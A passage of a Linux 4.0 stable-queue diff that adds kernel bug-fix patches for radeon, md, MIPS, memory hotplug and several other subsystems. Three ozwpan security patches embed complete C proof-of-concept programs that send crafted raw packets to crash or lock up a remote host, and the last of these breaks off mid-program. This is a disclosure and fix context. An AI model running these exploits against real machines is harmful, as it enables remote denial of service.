radeon_bo_reserve(bo_va->bo, false); + return r; + } + +@@ -575,6 +578,10 @@ int radeon_vm_bo_set_addr(struct radeon_ + + mutex_unlock(&vm->mutex); + return 0; ++ ++error_unreserve: ++ radeon_bo_unreserve(bo_va->bo); ++ return r; + } + + /** diff --git a/queue-4.0/drm-radeon-use-proper-acr-regisiter-for-dce3.2.patch b/queue-4.0/drm-radeon-use-proper-acr-regisiter-for-dce3.2.patch new file mode 100644 index 00000000000..f9069af4dfa --- /dev/null +++ b/queue-4.0/drm-radeon-use-proper-acr-regisiter-for-dce3.2.patch @@ -0,0 +1,32 @@ +From 091f0a70ffe2a1297d52fe32d6c6794d955e01e5 Mon Sep 17 00:00:00 2001 +From: Alex Deucher +Date: Mon, 1 Jun 2015 18:10:24 -0400 +Subject: drm/radeon: use proper ACR regisiter for DCE3.2 + +From: Alex Deucher + +commit 091f0a70ffe2a1297d52fe32d6c6794d955e01e5 upstream. + +Using the DCE2 one by accident afer the audio rework. + +Bug: +https://bugs.freedesktop.org/show_bug.cgi?id=90777 + +Signed-off-by: Alex Deucher +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/radeon/dce3_1_afmt.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/drivers/gpu/drm/radeon/dce3_1_afmt.c ++++ b/drivers/gpu/drm/radeon/dce3_1_afmt.c +@@ -173,7 +173,7 @@ void dce3_2_hdmi_update_acr(struct drm_e + struct drm_device *dev = encoder->dev; + struct radeon_device *rdev = dev->dev_private; + +- WREG32(HDMI0_ACR_PACKET_CONTROL + offset, ++ WREG32(DCE3_HDMI0_ACR_PACKET_CONTROL + offset, + HDMI0_ACR_SOURCE | /* select SW CTS value */ + HDMI0_ACR_AUTO_SEND); /* allow hw to sent ACR packets when required */ + diff --git a/queue-4.0/irqchip-sunxi-nmi-fix-off-by-one-error-in-irq-iterator.patch b/queue-4.0/irqchip-sunxi-nmi-fix-off-by-one-error-in-irq-iterator.patch new file mode 100644 index 00000000000..3d9f17589d3 --- /dev/null +++ b/queue-4.0/irqchip-sunxi-nmi-fix-off-by-one-error-in-irq-iterator.patch @@ -0,0 +1,33 @@ +From febe06962ab191db50e633a0f79d9fb89a2d1078 Mon Sep 17 00:00:00 2001 +From: Axel Lin +Date: Sun, 7 Jun 2015 21:33:29 +0800 +Subject: irqchip: sunxi-nmi: Fix off-by-one error in irq iterator + +From: Axel Lin + +commit febe06962ab191db50e633a0f79d9fb89a2d1078 upstream. + +Fixes: 6058bb362818 'ARM: sun7i/sun6i: irqchip: Add irqchip driver for NMI controller' +Signed-off-by: Axel Lin +Cc: Maxime Ripard +Cc: Carlo Caione +Cc: Jason Cooper +Link: http://lkml.kernel.org/r/1433684009.9134.1.camel@ingics.com +Signed-off-by: Thomas Gleixner +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/irqchip/irq-sunxi-nmi.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/drivers/irqchip/irq-sunxi-nmi.c ++++ b/drivers/irqchip/irq-sunxi-nmi.c +@@ -104,7 +104,7 @@ static int sunxi_sc_nmi_set_type(struct + irqd_set_trigger_type(data, flow_type); + irq_setup_alt_chip(data, flow_type); + +- for (i = 0; i <= gc->num_ct; i++, ct++) ++ for (i = 0; i < gc->num_ct; i++, ct++) + if (ct->type & flow_type) + ctrl_off = ct->regs.type; + diff --git a/queue-4.0/md-close-race-when-setting-action-to-idle.patch b/queue-4.0/md-close-race-when-setting-action-to-idle.patch new file mode 100644 index 00000000000..6ace1f00205 --- /dev/null +++ b/queue-4.0/md-close-race-when-setting-action-to-idle.patch @@ -0,0 +1,54 @@ +From 8e8e2518fceca407bb8fc2a6710d19d2e217892e Mon Sep 17 00:00:00 2001 +From: NeilBrown +Date: Fri, 12 Jun 2015 19:51:27 +1000 +Subject: md: Close race when setting 'action' to 'idle'. + +From: NeilBrown + +commit 8e8e2518fceca407bb8fc2a6710d19d2e217892e upstream. + +Checking ->sync_thread without holding the mddev_lock() +isn't really safe, even after flushing the workqueue which +ensures md_start_sync() has been run. + +While this code is waiting for the lock, md_check_recovery could reap +the thread itself, and then start another thread (e.g. recovery might +finish, then reshape starts). When this thread gets the lock +md_start_sync() hasn't run so it doesn't get reaped, but +MD_RECOVERY_RUNNING gets cleared. This allows two threads to start +which leads to confusion. + +So don't both if MD_RECOVERY_RUNNING isn't set, but if it is do +the flush and the test and the reap all under the mddev_lock to +avoid any race with md_check_recovery. + +Signed-off-by: NeilBrown +Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.") +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/md/md.c | 11 ++++++----- + 1 file changed, 6 insertions(+), 5 deletions(-) + +--- a/drivers/md/md.c ++++ b/drivers/md/md.c +@@ -4144,13 +4144,14 @@ action_store(struct mddev *mddev, const + set_bit(MD_RECOVERY_FROZEN, &mddev->recovery); + else + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); +- flush_workqueue(md_misc_wq); +- if (mddev->sync_thread) { +- set_bit(MD_RECOVERY_INTR, &mddev->recovery); +- if (mddev_lock(mddev) == 0) { ++ if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery) && ++ mddev_lock(mddev) == 0) { ++ flush_workqueue(md_misc_wq); ++ if (mddev->sync_thread) { ++ set_bit(MD_RECOVERY_INTR, &mddev->recovery); + md_reap_sync_thread(mddev); +- mddev_unlock(mddev); + } ++ mddev_unlock(mddev); + } + } else if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery) || + test_bit(MD_RECOVERY_NEEDED, &mddev->recovery)) diff --git a/queue-4.0/md-don-t-return-0-from-array_state_store.patch b/queue-4.0/md-don-t-return-0-from-array_state_store.patch new file mode 100644 index 00000000000..b306b90d743 --- /dev/null +++ b/queue-4.0/md-don-t-return-0-from-array_state_store.patch @@ -0,0 +1,34 @@ +From c008f1d356277a5b7561040596a073d87e56b0c8 Mon Sep 17 00:00:00 2001 +From: NeilBrown +Date: Fri, 12 Jun 2015 19:46:44 +1000 +Subject: md: don't return 0 from array_state_store + +From: NeilBrown + +commit c008f1d356277a5b7561040596a073d87e56b0c8 upstream. + +Returning zero from a 'store' function is bad. +The return value should be either len length of the string +or an error. + +So use 'len' if 'err' is zero. + +Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.") +Signed-off-by: NeilBrown +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/md/md.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/drivers/md/md.c ++++ b/drivers/md/md.c +@@ -3765,7 +3765,7 @@ array_state_store(struct mddev *mddev, c + err = -EBUSY; + } + spin_unlock(&mddev->lock); +- return err; ++ return err ?: len; + } + err = mddev_lock(mddev); + if (err) diff --git a/queue-4.0/mips-fix-enabling-of-debug_stackoverflow.patch b/queue-4.0/mips-fix-enabling-of-debug_stackoverflow.patch new file mode 100644 index 00000000000..0ebb85fb34c --- /dev/null +++ b/queue-4.0/mips-fix-enabling-of-debug_stackoverflow.patch @@ -0,0 +1,40 @@ +From 5f35b9cd553fd64415b563497d05a563c988dbd6 Mon Sep 17 00:00:00 2001 +From: James Hogan +Date: Thu, 4 Jun 2015 13:25:27 +0100 +Subject: MIPS: Fix enabling of DEBUG_STACKOVERFLOW + +From: James Hogan + +commit 5f35b9cd553fd64415b563497d05a563c988dbd6 upstream. + +Commit 334c86c494b9 ("MIPS: IRQ: Add stackoverflow detection") added +kernel stack overflow detection, however it only enabled it conditional +upon the preprocessor definition DEBUG_STACKOVERFLOW, which is never +actually defined. The Kconfig option is called DEBUG_STACKOVERFLOW, +which manifests to the preprocessor as CONFIG_DEBUG_STACKOVERFLOW, so +switch it to using that definition instead. + +Fixes: 334c86c494b9 ("MIPS: IRQ: Add stackoverflow detection") +Signed-off-by: James Hogan +Cc: Ralf Baechle +Cc: Adam Jiang +Cc: linux-mips@linux-mips.org +Patchwork: http://patchwork.linux-mips.org/patch/10531/ +Signed-off-by: Ralf Baechle +Signed-off-by: Greg Kroah-Hartman + +--- + arch/mips/kernel/irq.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/arch/mips/kernel/irq.c ++++ b/arch/mips/kernel/irq.c +@@ -109,7 +109,7 @@ void __init init_IRQ(void) + #endif + } + +-#ifdef DEBUG_STACKOVERFLOW ++#ifdef CONFIG_DEBUG_STACKOVERFLOW + static inline void check_stack_overflow(void) + { + unsigned long sp; diff --git a/queue-4.0/mips-kvm-do-not-sign-extend-on-unsigned-mmio-load.patch b/queue-4.0/mips-kvm-do-not-sign-extend-on-unsigned-mmio-load.patch new file mode 100644 index 00000000000..feed1f1ca48 --- /dev/null +++ b/queue-4.0/mips-kvm-do-not-sign-extend-on-unsigned-mmio-load.patch @@ -0,0 +1,39 @@ +From ed9244e6c534612d2b5ae47feab2f55a0d4b4ced Mon Sep 17 00:00:00 2001 +From: Nicholas Mc Guire +Date: Thu, 7 May 2015 14:47:50 +0200 +Subject: MIPS: KVM: Do not sign extend on unsigned MMIO load + +From: Nicholas Mc Guire + +commit ed9244e6c534612d2b5ae47feab2f55a0d4b4ced upstream. + +Fix possible unintended sign extension in unsigned MMIO loads by casting +to uint16_t in the case of mmio_needed != 2. + +Signed-off-by: Nicholas Mc Guire +Reviewed-by: James Hogan +Tested-by: James Hogan +Cc: Gleb Natapov +Cc: Paolo Bonzini +Cc: kvm@vger.kernel.org +Cc: linux-mips@linux-mips.org +Cc: linux-kernel@vger.kernel.org +Patchwork: https://patchwork.linux-mips.org/patch/9985/ +Signed-off-by: Ralf Baechle +Signed-off-by: Greg Kroah-Hartman + +--- + arch/mips/kvm/emulate.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/arch/mips/kvm/emulate.c ++++ b/arch/mips/kvm/emulate.c +@@ -2101,7 +2101,7 @@ enum emulation_result kvm_mips_complete_ + if (vcpu->mmio_needed == 2) + *gpr = *(int16_t *) run->mmio.data; + else +- *gpr = *(int16_t *) run->mmio.data; ++ *gpr = *(uint16_t *)run->mmio.data; + + break; + case 1: diff --git a/queue-4.0/mips-ralink-fix-clearing-the-illegal-access-interrupt.patch b/queue-4.0/mips-ralink-fix-clearing-the-illegal-access-interrupt.patch new file mode 100644 index 00000000000..5aa514bef52 --- /dev/null +++ b/queue-4.0/mips-ralink-fix-clearing-the-illegal-access-interrupt.patch @@ -0,0 +1,40 @@ +From 9dd6f1c166bc6e7b582f6203f2dc023ec65e3ed5 Mon Sep 17 00:00:00 2001 +From: Jonas Gorski +Date: Mon, 25 May 2015 19:53:54 +0200 +Subject: MIPS: ralink: Fix clearing the illegal access interrupt + +From: Jonas Gorski + +commit 9dd6f1c166bc6e7b582f6203f2dc023ec65e3ed5 upstream. + +Due to a typo the illegal access interrupt is never cleared in by +the interupt handler, causing an effective deadlock on the first +illegal access. + +This was broken since the code was introduced in 5433acd81e87 ("MIPS: +ralink: add illegal access driver"), but only exposed when the Kconfig +symbol was added, thus enabling the code. + +Fixes: a7b7aad383c ("MIPS: ralink: add missing symbol for RALINK_ILL_ACC") +Signed-off-by: Jonas Gorski +Cc: linux-mips@linux-mips.org +Cc: John Crispin +Patchwork: https://patchwork.linux-mips.org/patch/10172/ +Signed-off-by: Ralf Baechle +Signed-off-by: Greg Kroah-Hartman + +--- + arch/mips/ralink/ill_acc.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/arch/mips/ralink/ill_acc.c ++++ b/arch/mips/ralink/ill_acc.c +@@ -41,7 +41,7 @@ static irqreturn_t ill_acc_irq_handler(i + addr, (type >> ILL_ACC_OFF_S) & ILL_ACC_OFF_M, + type & ILL_ACC_LEN_M); + +- rt_memc_w32(REG_ILL_ACC_TYPE, REG_ILL_ACC_TYPE); ++ rt_memc_w32(ILL_INT_STATUS, REG_ILL_ACC_TYPE); + + return IRQ_HANDLED; + } diff --git a/queue-4.0/mm-memory_hotplug.c-set-zone-wait_table-to-null-after-freeing-it.patch b/queue-4.0/mm-memory_hotplug.c-set-zone-wait_table-to-null-after-freeing-it.patch new file mode 100644 index 00000000000..c9f39ab2670 --- /dev/null +++ b/queue-4.0/mm-memory_hotplug.c-set-zone-wait_table-to-null-after-freeing-it.patch @@ -0,0 +1,94 @@ +From 85bd839983778fcd0c1c043327b14a046e979b39 Mon Sep 17 00:00:00 2001 +From: Gu Zheng +Date: Wed, 10 Jun 2015 11:14:43 -0700 +Subject: mm/memory_hotplug.c: set zone->wait_table to null after freeing it + +From: Gu Zheng + +commit 85bd839983778fcd0c1c043327b14a046e979b39 upstream. + +Izumi found the following oops when hot re-adding a node: + + BUG: unable to handle kernel paging request at ffffc90008963690 + IP: __wake_up_bit+0x20/0x70 + Oops: 0000 [#1] SMP + CPU: 68 PID: 1237 Comm: rs:main Q:Reg Not tainted 4.1.0-rc5 #80 + Hardware name: FUJITSU PRIMEQUEST2800E/SB, BIOS PRIMEQUEST 2000 Series BIOS Version 1.87 04/28/2015 + task: ffff880838df8000 ti: ffff880017b94000 task.ti: ffff880017b94000 + RIP: 0010:[] [] __wake_up_bit+0x20/0x70 + RSP: 0018:ffff880017b97be8 EFLAGS: 00010246 + RAX: ffffc90008963690 RBX: 00000000003c0000 RCX: 000000000000a4c9 + RDX: 0000000000000000 RSI: ffffea101bffd500 RDI: ffffc90008963648 + RBP: ffff880017b97c08 R08: 0000000002000020 R09: 0000000000000000 + R10: 0000000000000000 R11: 0000000000000000 R12: ffff8a0797c73800 + R13: ffffea101bffd500 R14: 0000000000000001 R15: 00000000003c0000 + FS: 00007fcc7ffff700(0000) GS:ffff880874800000(0000) knlGS:0000000000000000 + CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 + CR2: ffffc90008963690 CR3: 0000000836761000 CR4: 00000000001407e0 + Call Trace: + unlock_page+0x6d/0x70 + generic_write_end+0x53/0xb0 + xfs_vm_write_end+0x29/0x80 [xfs] + generic_perform_write+0x10a/0x1e0 + xfs_file_buffered_aio_write+0x14d/0x3e0 [xfs] + xfs_file_write_iter+0x79/0x120 [xfs] + __vfs_write+0xd4/0x110 + vfs_write+0xac/0x1c0 + SyS_write+0x58/0xd0 + system_call_fastpath+0x12/0x76 + Code: 5d c3 66 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 55 48 89 e5 48 83 ec 20 65 48 8b 04 25 28 00 00 00 48 89 45 f8 31 c0 48 8d 47 48 <48> 39 47 48 48 c7 45 e8 00 00 00 00 48 c7 45 f0 00 00 00 00 48 + RIP [] __wake_up_bit+0x20/0x70 + RSP + CR2: ffffc90008963690 + +Reproduce method (re-add a node):: + Hot-add nodeA --> remove nodeA --> hot-add nodeA (panic) + +This seems an use-after-free problem, and the root cause is +zone->wait_table was not set to *NULL* after free it in +try_offline_node. + +When hot re-add a node, we will reuse the pgdat of it, so does the zone +struct, and when add pages to the target zone, it will init the zone +first (including the wait_table) if the zone is not initialized. The +judgement of zone initialized is based on zone->wait_table: + + static inline bool zone_is_initialized(struct zone *zone) + { + return !!zone->wait_table; + } + +so if we do not set the zone->wait_table to *NULL* after free it, the +memory hotplug routine will skip the init of new zone when hot re-add +the node, and the wait_table still points to the freed memory, then we +will access the invalid address when trying to wake up the waiting +people after the i/o operation with the page is done, such as mentioned +above. + +Signed-off-by: Gu Zheng +Reported-by: Taku Izumi +Reviewed by: Yasuaki Ishimatsu +Cc: KAMEZAWA Hiroyuki +Cc: Tang Chen +Signed-off-by: Andrew Morton +Signed-off-by: Linus Torvalds +Signed-off-by: Greg Kroah-Hartman + +--- + mm/memory_hotplug.c | 4 +++- + 1 file changed, 3 insertions(+), 1 deletion(-) + +--- a/mm/memory_hotplug.c ++++ b/mm/memory_hotplug.c +@@ -1978,8 +1978,10 @@ void try_offline_node(int nid) + * wait_table may be allocated from boot memory, + * here only free if it's allocated by vmalloc. + */ +- if (is_vmalloc_addr(zone->wait_table)) ++ if (is_vmalloc_addr(zone->wait_table)) { + vfree(zone->wait_table); ++ zone->wait_table = NULL; ++ } + } + } + EXPORT_SYMBOL(try_offline_node); diff --git a/queue-4.0/of-dynamic-fix-test-for-ppc_pseries.patch b/queue-4.0/of-dynamic-fix-test-for-ppc_pseries.patch new file mode 100644 index 00000000000..9148c870117 --- /dev/null +++ b/queue-4.0/of-dynamic-fix-test-for-ppc_pseries.patch @@ -0,0 +1,36 @@ +From f76502aa9140ec338a59487218bf70a9c9e92b8f Mon Sep 17 00:00:00 2001 +From: Geert Uytterhoeven +Date: Thu, 4 Jun 2015 11:34:41 +0200 +Subject: of/dynamic: Fix test for PPC_PSERIES + +From: Geert Uytterhoeven + +commit f76502aa9140ec338a59487218bf70a9c9e92b8f upstream. + +"IS_ENABLED(PPC_PSERIES)" always evaluates to false, as IS_ENABLED() is +supposed to be used with the full Kconfig symbol name, including the +"CONFIG_" prefix. + +Add the missing "CONFIG_" prefix to fix this. + +Fixes: a25095d451ece23b ("of: Move dynamic node fixups out of powerpc and into common code") + +Signed-off-by: Geert Uytterhoeven +Signed-off-by: Grant Likely +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/of/dynamic.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/drivers/of/dynamic.c ++++ b/drivers/of/dynamic.c +@@ -225,7 +225,7 @@ void __of_attach_node(struct device_node + phandle = __of_get_property(np, "phandle", &sz); + if (!phandle) + phandle = __of_get_property(np, "linux,phandle", &sz); +- if (IS_ENABLED(PPC_PSERIES) && !phandle) ++ if (IS_ENABLED(CONFIG_PPC_PSERIES) && !phandle) + phandle = __of_get_property(np, "ibm,phandle", &sz); + np->phandle = (phandle && (sz >= 4)) ? be32_to_cpup(phandle) : 0; + diff --git a/queue-4.0/ozwpan-divide-by-zero-leading-to-panic.patch b/queue-4.0/ozwpan-divide-by-zero-leading-to-panic.patch new file mode 100644 index 00000000000..dde035d0743 --- /dev/null +++ b/queue-4.0/ozwpan-divide-by-zero-leading-to-panic.patch @@ -0,0 +1,181 @@ +From 04bf464a5dfd9ade0dda918e44366c2c61fce80b Mon Sep 17 00:00:00 2001 +From: "Jason A. Donenfeld" +Date: Fri, 29 May 2015 13:07:00 +0200 +Subject: ozwpan: divide-by-zero leading to panic + +From: "Jason A. Donenfeld" + +commit 04bf464a5dfd9ade0dda918e44366c2c61fce80b upstream. + +A network supplied parameter was not checked before division, leading to +a divide-by-zero. Since this happens in the softirq path, it leads to a +crash. A PoC follows below, which requires the ozprotocol.h file from +this module. + +=-=-=-=-=-= + + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define u8 uint8_t + #define u16 uint16_t + #define u32 uint32_t + #define __packed __attribute__((__packed__)) + #include "ozprotocol.h" + +static int hex2num(char c) +{ + if (c >= '0' && c <= '9') + return c - '0'; + if (c >= 'a' && c <= 'f') + return c - 'a' + 10; + if (c >= 'A' && c <= 'F') + return c - 'A' + 10; + return -1; +} +static int hwaddr_aton(const char *txt, uint8_t *addr) +{ + int i; + for (i = 0; i < 6; i++) { + int a, b; + a = hex2num(*txt++); + if (a < 0) + return -1; + b = hex2num(*txt++); + if (b < 0) + return -1; + *addr++ = (a << 4) | b; + if (i < 5 && *txt++ != ':') + return -1; + } + return 0; +} + +int main(int argc, char *argv[]) +{ + if (argc < 3) { + fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); + return 1; + } + + uint8_t dest_mac[6]; + if (hwaddr_aton(argv[2], dest_mac)) { + fprintf(stderr, "Invalid mac address.\n"); + return 1; + } + + int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); + if (sockfd < 0) { + perror("socket"); + return 1; + } + + struct ifreq if_idx; + int interface_index; + strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); + if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { + perror("SIOCGIFINDEX"); + return 1; + } + interface_index = if_idx.ifr_ifindex; + if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { + perror("SIOCGIFHWADDR"); + return 1; + } + uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; + + struct { + struct ether_header ether_header; + struct oz_hdr oz_hdr; + struct oz_elt oz_elt; + struct oz_elt_connect_req oz_elt_connect_req; + struct oz_elt oz_elt2; + struct oz_multiple_fixed oz_multiple_fixed; + } __packed packet = { + .ether_header = { + .ether_type = htons(OZ_ETHERTYPE), + .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, + .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }, + .oz_hdr = { + .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), + .last_pkt_num = 0, + .pkt_num = htole32(0) + }, + .oz_elt = { + .type = OZ_ELT_CONNECT_REQ, + .length = sizeof(struct oz_elt_connect_req) + }, + .oz_elt_connect_req = { + .mode = 0, + .resv1 = {0}, + .pd_info = 0, + .session_id = 0, + .presleep = 0, + .ms_isoc_latency = 0, + .host_vendor = 0, + .keep_alive = 0, + .apps = htole16((1 << OZ_APPID_USB) | 0x1), + .max_len_div16 = 0, + .ms_per_isoc = 0, + .up_audio_buf = 0, + .ms_per_elt = 0 + }, + .oz_elt2 = { + .type = OZ_ELT_APP_DATA, + .length = sizeof(struct oz_multiple_fixed) + }, + .oz_multiple_fixed = { + .app_id = OZ_APPID_USB, + .elt_seq_num = 0, + .type = OZ_USB_ENDPOINT_DATA, + .endpoint = 0, + .format = OZ_DATA_F_MULTIPLE_FIXED, + .unit_size = 0, + .data = {0} + } + }; + + struct sockaddr_ll socket_address = { + .sll_ifindex = interface_index, + .sll_halen = ETH_ALEN, + .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }; + + if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { + perror("sendto"); + return 1; + } + return 0; +} + +Signed-off-by: Jason A. Donenfeld +Acked-by: Dan Carpenter +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/staging/ozwpan/ozusbsvc1.c | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +--- a/drivers/staging/ozwpan/ozusbsvc1.c ++++ b/drivers/staging/ozwpan/ozusbsvc1.c +@@ -326,7 +326,10 @@ static void oz_usb_handle_ep_data(struct + struct oz_multiple_fixed *body = + (struct oz_multiple_fixed *)data_hdr; + u8 *data = body->data; +- int n = (len - sizeof(struct oz_multiple_fixed)+1) ++ int n; ++ if (!body->unit_size) ++ break; ++ n = (len - sizeof(struct oz_multiple_fixed)+1) + / body->unit_size; + while (n--) { + oz_hcd_data_ind(usb_ctx->hport, body->endpoint, diff --git a/queue-4.0/ozwpan-unchecked-signed-subtraction-leads-to-dos.patch b/queue-4.0/ozwpan-unchecked-signed-subtraction-leads-to-dos.patch new file mode 100644 index 00000000000..0e89626476c --- /dev/null +++ b/queue-4.0/ozwpan-unchecked-signed-subtraction-leads-to-dos.patch @@ -0,0 +1,186 @@ +From 9a59029bc218b48eff8b5d4dde5662fd79d3e1a8 Mon Sep 17 00:00:00 2001 +From: "Jason A. Donenfeld" +Date: Fri, 29 May 2015 13:07:01 +0200 +Subject: ozwpan: unchecked signed subtraction leads to DoS + +From: "Jason A. Donenfeld" + +commit 9a59029bc218b48eff8b5d4dde5662fd79d3e1a8 upstream. + +The subtraction here was using a signed integer and did not have any +bounds checking at all. This commit adds proper bounds checking, made +easy by use of an unsigned integer. This way, a single packet won't be +able to remotely trigger a massive loop, locking up the system for a +considerable amount of time. A PoC follows below, which requires +ozprotocol.h from this module. + +=-=-=-=-=-= + + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define u8 uint8_t + #define u16 uint16_t + #define u32 uint32_t + #define __packed __attribute__((__packed__)) + #include "ozprotocol.h" + +static int hex2num(char c) +{ + if (c >= '0' && c <= '9') + return c - '0'; + if (c >= 'a' && c <= 'f') + return c - 'a' + 10; + if (c >= 'A' && c <= 'F') + return c - 'A' + 10; + return -1; +} +static int hwaddr_aton(const char *txt, uint8_t *addr) +{ + int i; + for (i = 0; i < 6; i++) { + int a, b; + a = hex2num(*txt++); + if (a < 0) + return -1; + b = hex2num(*txt++); + if (b < 0) + return -1; + *addr++ = (a << 4) | b; + if (i < 5 && *txt++ != ':') + return -1; + } + return 0; +} + +int main(int argc, char *argv[]) +{ + if (argc < 3) { + fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); + return 1; + } + + uint8_t dest_mac[6]; + if (hwaddr_aton(argv[2], dest_mac)) { + fprintf(stderr, "Invalid mac address.\n"); + return 1; + } + + int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); + if (sockfd < 0) { + perror("socket"); + return 1; + } + + struct ifreq if_idx; + int interface_index; + strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); + if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { + perror("SIOCGIFINDEX"); + return 1; + } + interface_index = if_idx.ifr_ifindex; + if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { + perror("SIOCGIFHWADDR"); + return 1; + } + uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; + + struct { + struct ether_header ether_header; + struct oz_hdr oz_hdr; + struct oz_elt oz_elt; + struct oz_elt_connect_req oz_elt_connect_req; + struct oz_elt oz_elt2; + struct oz_multiple_fixed oz_multiple_fixed; + } __packed packet = { + .ether_header = { + .ether_type = htons(OZ_ETHERTYPE), + .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, + .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }, + .oz_hdr = { + .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), + .last_pkt_num = 0, + .pkt_num = htole32(0) + }, + .oz_elt = { + .type = OZ_ELT_CONNECT_REQ, + .length = sizeof(struct oz_elt_connect_req) + }, + .oz_elt_connect_req = { + .mode = 0, + .resv1 = {0}, + .pd_info = 0, + .session_id = 0, + .presleep = 0, + .ms_isoc_latency = 0, + .host_vendor = 0, + .keep_alive = 0, + .apps = htole16((1 << OZ_APPID_USB) | 0x1), + .max_len_div16 = 0, + .ms_per_isoc = 0, + .up_audio_buf = 0, + .ms_per_elt = 0 + }, + .oz_elt2 = { + .type = OZ_ELT_APP_DATA, + .length = sizeof(struct oz_multiple_fixed) - 3 + }, + .oz_multiple_fixed = { + .app_id = OZ_APPID_USB, + .elt_seq_num = 0, + .type = OZ_USB_ENDPOINT_DATA, + .endpoint = 0, + .format = OZ_DATA_F_MULTIPLE_FIXED, + .unit_size = 1, + .data = {0} + } + }; + + struct sockaddr_ll socket_address = { + .sll_ifindex = interface_index, + .sll_halen = ETH_ALEN, + .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } + }; + + if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { + perror("sendto"); + return 1; + } + return 0; +} + +Signed-off-by: Jason A. Donenfeld +Acked-by: Dan Carpenter +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/staging/ozwpan/ozusbsvc1.c | 7 ++++--- + 1 file changed, 4 insertions(+), 3 deletions(-) + +--- a/drivers/staging/ozwpan/ozusbsvc1.c ++++ b/drivers/staging/ozwpan/ozusbsvc1.c +@@ -326,10 +326,11 @@ static void oz_usb_handle_ep_data(struct + struct oz_multiple_fixed *body = + (struct oz_multiple_fixed *)data_hdr; + u8 *data = body->data; +- int n; +- if (!body->unit_size) ++ unsigned int n; ++ if (!body->unit_size || ++ len < sizeof(struct oz_multiple_fixed) - 1) + break; +- n = (len - sizeof(struct oz_multiple_fixed)+1) ++ n = (len - (sizeof(struct oz_multiple_fixed) - 1)) + / body->unit_size; + while (n--) { + oz_hcd_data_ind(usb_ctx->hport, body->endpoint, diff --git a/queue-4.0/ozwpan-use-proper-check-to-prevent-heap-overflow.patch b/queue-4.0/ozwpan-use-proper-check-to-prevent-heap-overflow.patch new file mode 100644 index 00000000000..b801763f505 --- /dev/null +++ b/queue-4.0/ozwpan-use-proper-check-to-prevent-heap-overflow.patch @@ -0,0 +1,215 @@ +From d114b9fe78c8d6fc6e70808c2092aa307c36dc8e Mon Sep 17 00:00:00 2001 +From: "Jason A. Donenfeld" +Date: Fri, 29 May 2015 13:06:58 +0200 +Subject: ozwpan: Use proper check to prevent heap overflow + +From: "Jason A. Donenfeld" + +commit d114b9fe78c8d6fc6e70808c2092aa307c36dc8e upstream. + +Since elt->length is a u8, we can make this variable a u8. Then we can +do proper bounds checking more easily. Without this, a potentially +negative value is passed to the memcpy inside oz_hcd_get_desc_cnf, +resulting in a remotely exploitable heap overflow with network +supplied data. + +This could result in remote code execution. A PoC which obtains DoS +follows below. It requires the ozprotocol.h file from this module. + +=-=-=-=-=-= + + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define u8 uint8_t + #define u16 uint16_t + #define u32 uint32_t + #define __packed __attribute__((__packed__)) + #include "ozprotocol.h" + +static int hex2num(char c) +{ + if (c >= '0' && c <= '9') + return c - '0'; + if (c >= 'a' && c <= 'f') + return c - 'a' + 10; + if (c >= 'A' && c <= 'F') + return c - 'A' + 10; + return -1; +} +static int hwaddr_aton(const char *txt, uint8_t *addr) +{ + int i; + for (i = 0; i < 6; i++) { + int a, b; + a = hex2num(*txt++); + if 